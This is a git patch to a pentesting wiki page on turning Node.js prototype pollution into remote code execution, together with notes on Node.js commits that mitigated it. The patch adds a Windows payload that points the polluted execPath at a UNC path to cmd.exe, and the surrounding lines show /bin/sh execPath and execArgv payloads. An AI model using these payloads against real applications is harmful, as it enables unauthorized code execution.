From a69eb0b9c055225e1569b1bba223f22a25b9685e Mon Sep 17 00:00:00 2001 From: CPol Date: Wed, 2 Nov 2022 23:04:12 +0000 Subject: [PATCH] GitBook: [#3639] No subject --- .../prototype-pollution-to-rce.md | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md b/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md index c992684d2..68dc80996 100644 --- a/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md +++ b/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md @@ -256,6 +256,12 @@ b.__proto__.execPath = "/bin/sh" b.__proto__.argv0 = "/bin/sh" b.__proto__.execArgv = ["-c", "touch /tmp/fork-execArgv"] var proc = fork('./a_file.js'); + +//With a Windows Remote payloadPayload +const { fork } = require('child_process'); +b = {} +b.__proto__.execPath = "\\\\127.0.0.1\\C$\\Windows\\System32\\cmd.exe" +var proc = fork('./a_file.js'); ``` {% endcode %} @@ -612,10 +618,10 @@ However, as the previous **`child_process`** methods, it has been **fixed** in t Please, note that prototype pollution works if the **attribute** of an object that is being accessed is **undefined**. If in the **code** that **attribute** is **set** a **value** you **won't be able to overwrite it**. -In Jun 2022 from [**this commit**](https://github.com/nodejs/node/commit/20b0df1d1eba957ea30ba618528debbe02a97c6a) the var `options` instead of a `{}` is a **`kEmptyObject`**. Which **prevents a prototype pollution** from affecting the **attributes** of **`options`** to obtain RCE.\ +In Jun 2022 from [**this commit**](https://github.com/nodejs/node/commit/20b0df1d1eba957ea30ba618528debbe02a97c6a) the var `options` instead of a `{}` is a **`kEmptyObject`**. Which **prevents a prototype pollution** from affecting the **attributes** of **`options`** to obtain RCE.\ At least from v18.4.0 this protection has been **implemented,** and therefore the `spawn` and `spawnSync` **exploits** affecting the methods **no longer work** (if no `options` are used!). -In [**this commit**](https://github.com/nodejs/node/commit/0313102aaabb49f78156cadc1b3492eac3941dd9) the **prototype pollution** of **`contextExtensions`** from the vm library was **also kind of fixed** setting options to **`kEmptyObject` ** instead of **`{}`.** +In [**this commit**](https://github.com/nodejs/node/commit/0313102aaabb49f78156cadc1b3492eac3941dd9) the **prototype pollution** of **`contextExtensions`** from the vm library was **also kind of fixed** setting options to \*\*`kEmptyObject` \*\* instead of **`{}`.** ## References